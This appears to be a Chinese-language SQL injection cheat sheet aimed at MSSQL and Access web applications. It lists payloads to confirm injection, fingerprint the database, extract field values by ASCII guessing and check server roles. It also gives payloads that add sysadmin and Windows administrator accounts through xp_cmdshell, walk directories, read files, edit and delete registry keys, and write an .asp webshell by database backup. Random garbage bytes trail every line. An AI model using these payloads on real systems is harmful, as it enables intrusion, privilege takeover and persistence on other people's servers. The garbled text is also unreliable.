1.判断是否有注入;and 1=1 ;and 1=2 xN�m3��2~
2.初步判断是否是mssql ;and user>0 �hcgc
=$^�
-k
�<9v�.:
3.注入参数是字符'and [查询条件] and ''=' ���E)JyKm.
^�B5�cNEO�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ��S�@g/�Tn
(`�]*Y(/2G
5.判断数据库系统 i5K�wY��oN
V0Z7�o\-�J
;and (select count(*) from sysobjects)>0 mssql H�m
�VTfH'
daI�L> c"�
;and (select count(*) from msysobjects)>0 access b'1d<�s�D�
,�imvA�5�
�n+��qVT4o
&��fSc{�/
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �E)O|16f|>
K)�`:�v|d�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 1 j12�Qn@]
�be�z'[�Y{
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 R5e�B�,F�N
-�t�6R!Z�I
9.(1)猜字段的ascii值(access) �p�,iCM?[|
q83~j�`ZJ$
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 GD[�ou.C}k
UY-IHz;&O-
(2)猜字段的ascii值(mssql) B��`B%:#��
%��i-lx`U�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �"�q^#39i?
S[���~O'�)
10.测试权限结构(mssql) cN WcN�Mm
=��/g�$b�Z
[Hj�'nA�^�
qX+gG",�8�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- cvU�ut^CdK
A3$aMC�wKd
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 8F��^,8kIR
R��F5q5�<0
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- \`�/E
!ub
+���F o$o
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- e�m1cc,���
!w�d'�::C
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- T1�Q�sW<*j
E ;!�<Z��4
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- *?b�k?*?s�
�=kb6xmB^t
;and 1=(select IS_MEMBER('db_owner'));-- �#t@x�6Vt�
e[Q�xFg0E�
)4�~s��Q^}
�:@ E1Pun?
11.添加mssql和系统的帐户 |jk�-@ Z*�
&�Q�Te�Gn�
;exec master.dbo.sp_addlogin username;-- ��'q9��2E(
;exec master.dbo.sp_password null,username,password;-- {@V3?p�G?p
�WY"Y���)S
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- FKo�x0Jmh=
@?Gw|�bP��
;exec master.dbo.xp_cmdshell 'net user username password �l+�2c�j?X
30?LsYXL62
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- hDlj�Y!P>p
9��$+^"ilk
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �aZj J]~bO
�rg5]`-�!=
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- R3j#WgltP
m-p�h���}�
0��\'Q&oTo
3e%l�8@R�@
12.(1)遍历目录 eA?uny
f2r
X
45�x�~8f
;create table dirs(paths varchar(100), id int) wb6��L�?�t
ahNX/3�;�y
;insert dirs exec master.dbo.xp_dirtree 'c:\' Kx��- s0cw
f6B-~x<�l
;and (select top 1 paths from dirs)>0 \\S/���NA
dK}WM46$��
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �#0bO)m+NZ
7�}ws�
|4Y
kS+r"e
.TM
({%oi���h�
(2)遍历目录 �)'[x)��q�
"{�A�*(.�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ;8*XOC;�[�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 h
`�\$sT!Z
nn���@�^K6
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 7m:|u*ij2~
�Uz�gA26;�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 v�/R�[?H)�
�b0@��>x�T
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 b�4Z`y8=��
���R"U/R�S
�F qeV�3�N
Zc'|�!pT _
13.mssql中的存储过程 /m��`}f�]u
s\'y-UITi1
xp_regenumvalues 注册表根键, 子键 p)B33Z��zC
<�<=�e9Lh�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ���8��]�q�
CmEpir�{}(
xp_regread 根键,子键,键值名 O^9CV*]!n�
z�L:&Q��<
;exec xp_regread �ZV'$k�\��
�l���W�x�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 T'�ED$}N>~
��0xJ7M��.
xp_regwrite 根键,子键, 值名, 值类型, 值 �/�?KtXV>]
;V_��.�[aX
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 B�_{HkQ.PW
�}p�~OC�W!
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 6'x�omRpYN
B��7!<{�i
xp_regdeletevalue 根键,子键,值名 �_u&>&,:q
/g�_��9m�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �%#~((m�1�
AV40�:y\RW
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �Q��6"�uK
��gNS�hO�u
S4�cp�Qq.�
M|\^UF�2�e
14.mssql的backup创建webshell o�#qH2)t�b
CRH{�E}>��
use model #6Jc}g<�?g
t,
�U)
~wi
create table cmd(str image); *�GQD�fs`m
�pz�p,t(%j
insert into cmd(str) values (''); &�+ �KyPY+
t3P�tKgP-6
backup database model to disk='c:\l.asp'; 7�vn%k�W=$
~�C&��*.ZR
9O;cJ)tXY�
qG�<7hr@x]
15.mssql内置函数 t\h$&[[l'z
NJtQx2Sd'H
;and (select @@version)>0 获得Windows的版本号 �w�V(A�T�$
_�7U]&Nh99
;and user_name()='dbo' 判断当前系统的连接用户是不是sa X1+��wX`f�
J/�2�j;,8D
;and (select user_name())>0 爆当前系统的连接用户 :Sr?6F�Pc�
~+yZfOc�w�
;and (select db_name())>0 得到当前连接的数据库 x^G�'rF"nT
UuU/c�-.��
*�?/tO,
R?
B��ZK2$��0
16.简洁的webshell �C5xag#Z1
zuSq+px�L@
use model �R�}8XR�e
�Wf#�VA;d
create table cmd(str image); _;5�6^1�'T
$ ��a�?��
insert into cmd(str) values (''); �e}��'gv�m
ohUdGO�[/�
backup database model to disk='g:\wwwtest\l.asp';
